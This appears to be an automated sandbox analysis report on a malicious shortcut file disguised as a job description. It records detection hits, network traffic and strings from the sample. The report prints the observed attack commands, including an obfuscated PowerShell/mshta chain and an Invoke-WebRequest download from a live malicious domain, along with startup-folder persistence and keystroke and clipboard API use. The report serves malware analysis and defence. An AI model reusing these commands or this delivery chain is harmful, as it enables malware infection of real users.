Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7996, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 2792, ProcessName: SwiftWrite.pif
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2608, TargetFilename: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe" , ParentImage: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe, ParentProcessId: 7952, ParentProcessName: rMpqCJnPv.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7988, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe" , ParentImage: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe, ParentProcessId: 7952, ParentProcessName: rMpqCJnPv.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7988, ProcessName: powershell.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7996, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 6648, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1'), ProcessId: 4180, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3176, ProcessName: svchost.exe

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 8112, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-23T07:11:35.553406+010020264341A Network Trojan was detected147.45.49.155443192.168.2.549704TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-23T07:11:49.698928+010028033053Unknown Traffic192.168.2.549714147.45.49.155443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeReversingLabs: Detection: 30%
Multi AV Scanner detection for submitted file
Source: FzmtNV0vnG.lnkVirustotal: Detection: 26%Perma Link
Source: FzmtNV0vnG.lnkReversingLabs: Detection: 21%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.2128979328.000002428AD54000.00000004.00000020.00020000.00000000.sdmp, baochuan1[1].6.dr
Source: Binary string: sethc.pdb source: baochuan1[1].6.dr
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,15_2_00007FF7BB85C7C0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00007FF7BB85BC70
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8672A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,15_2_00007FF7BB8672A8
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8671F4 FindFirstFileW,FindClose,15_2_00007FF7BB8671F4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00007FF7BB85B7C0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB822F50 FindFirstFileExW,15_2_00007FF7BB822F50
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB86A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,15_2_00007FF7BB86A4F8
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB866428 FindFirstFileW,FindNextFileW,FindClose,15_2_00007FF7BB866428
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB86A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,15_2_00007FF7BB86A350
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB86A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_00007FF7BB86A874

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2026434 - Severity 1 - ET MALWARE VBScript Redirect Style Exe File Download : 147.45.49.155:443 -> 192.168.2.5:49704
Source: global trafficHTTP traffic detected: GET /Job_Description.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rMpqCJnPv.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /ygUmFny.txt HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 147.45.49.155:443
Source: global trafficHTTP traffic detected: GET /baochuan1 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gIpBYOi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tiffany-careers.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB86E968 InternetQueryDataAvailable,InternetReadFile,15_2_00007FF7BB86E968
Source: global trafficHTTP traffic detected: GET /baochuan1 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Job_Description.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rMpqCJnPv.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /gIpBYOi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ygUmFny.txt HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: tiffany-careers.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8705A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2089152585.0000021D26245000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2312678509.000002AB86E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80AA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8705A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000016.00000000.2409567438.0000000000EA9000.00000002.00000001.01000000.00000010.sdmp, Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 0000001B.00000000.2554375542.0000000000939000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000014.00000002.2525206353.0000029EF5DE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: 2D85F72862B55C4EADD9E66E06947F3D0.13.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000005.00000002.2089152585.0000021D2628C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2089152585.0000021D26263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2312678509.000002AB86E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000007.00000003.2119800024.000001DC580D3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000007.00000003.2119800024.000001DC58060000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8705A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.3499608749.000002AB96E9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.c
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.co
Source: WMIC.exe, 00000000.00000003.2061399182.000002902AA07000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000000.00000002.2063481089.000002902AA09000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2312678509.000002AB8705A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2415190545.0000029E80AA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8705A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/Job_Description.pdf
Source: powershell.exe, 00000005.00000002.2089152585.0000021D2672E000.00000004.00000800.00020000.00000000.sdmp, FzmtNV0vnG.lnkString found in binary or memory: https://tiffany-careers.com/baochuan1
Source: powershell.exeString found in binary or memory: https://tiffany-careers.com/baochuan1$global:?
Source: powershell.exe, 00000005.00000002.2089011782.0000021D24620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/baochuan1;.
Source: powershell.exe, 00000005.00000002.2088198399.0000021D243AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/baochuan1Y0
Source: powershell.exe, 00000005.00000002.2089152585.0000021D266D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/baochuan1h
Source: powershell.exe, 00000005.00000002.2089152585.0000021D26231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/baochuan1p
Source: rMpqCJnPv.exe, 0000000F.00000002.2357940183.0000021B0E419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/gIpBYOi
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/r
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/rM
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/rMp
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/rMpq
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/rMpqC
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/rMpqCJ
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/rMpqCJn
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/rMpqCJnP
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/rMpqCJnPv
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/rMpqCJnPv.
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/rMpqCJnPv.e
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/rMpqCJnPv.ex
Source: powershell.exe, 00000008.00000002.2312678509.000002AB8C25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/rMpqCJnPv.exe
Source: powershell.exe, 00000014.00000002.2415190545.0000029E80231000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.15.drString found in binary or memory: https://tiffany-careers.com/ygUmFny.txt
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Guard.exe.16.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000016.00000003.2429777569.0000000004675000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.22.dr, Guard.exe.16.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB870A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,15_2_00007FF7BB870A6C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB870D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,15_2_00007FF7BB870D24
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB870A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,15_2_00007FF7BB870A6C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7E1CEC GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,15_2_00007FF7BB7E1CEC

System Summary

barindex
Binary is likely a compiled AutoIt script file
Source: powershell.exe, 00000008.00000002.3499608749.000002AB9706F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_db922962-2
Source: powershell.exe, 00000008.00000002.3499608749.000002AB9706F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 